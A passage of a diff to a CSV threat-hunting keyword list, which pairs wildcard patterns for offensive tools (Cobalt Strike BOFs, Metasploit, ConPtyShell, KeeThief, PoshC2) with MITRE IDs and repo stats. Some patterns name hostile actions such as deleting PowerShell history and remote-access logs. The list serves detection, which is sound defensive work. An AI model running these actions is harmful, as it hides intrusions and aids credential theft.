Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*Remote/suspendresume/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*remote_exploit.erb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*remote_exploit_cmd_stager.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*remote_exploit_demo_template.erb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*remote_shell.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*-remote=127.0.0.1:3000*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*Remote/lastpass/lastpass.x86.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*Remote/setuserpass/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*Remote/shspawnas*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*Remote/suspendresume/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*remote_exploit.erb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*remote_exploit_cmd_stager.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*remote_exploit_demo_template.erb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*remote_shell.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*-remote=127.0.0.1:3000*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" "*remote-exec *jump *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*RemoteHashRetrieval.ps1*","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","356","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" -"*-RemoteIp * -RemotePort * -Rows * -Cols * -CommandLine *.exe*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","0","N/A","N/A","9","817","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" -"*remote-method-guesser/rmg*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*remote-method-guesser-master*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*-RemoteIp * -RemotePort * -Rows * -Cols * -CommandLine *.exe*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","0","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"*remote-method-guesser/rmg*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*remote-method-guesser-master*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" "*RemoteNTDLL.cpp*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" "*RemoteNTDLL.exe*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" "*remotereg.cna*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*RemoteScanner.exe*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","","N/A","","","" -"*remotewinenum.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*remotewinenum.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*Remove_Privilege /Process:* /Privilege:*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" -"*removeexe-persistence*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Remove-Item (Get-PSreadlineOption).HistorySavePath*","offensive_tool_keyword","powershell","Delete powershell history","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*removeexe-persistence*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Remove-Item (Get-PSreadlineOption).HistorySavePath*","offensive_tool_keyword","powershell","Delete powershell history","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" "*Remove-Item *C:\Program Files*\TeamViewer\TeamViewer*_Logfile.log*","offensive_tool_keyword","malware","observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. deletion of these logs file is suspicious and could be the actions of intruders hiding their traces","T1070","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Remove-Item *C:\Users\*\AppData\Roaming\AnyDesk\connection_trace.txt*","offensive_tool_keyword","malware","observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. deletion of these logs file is suspicious and could be the actions of intruders hiding their traces","T1070","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Remove-KeePassConfigTrigger*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" -"*RemoveKeePassTrigger.ps1*","offensive_tool_keyword","crackmapexec","Keepass exploitations from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*remove-persistence*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Remove-Persistence.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*remove-persistence-cron*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Remove-PoshRat*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*RemoveKeePassTrigger.ps1*","offensive_tool_keyword","crackmapexec","Keepass exploitations from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation 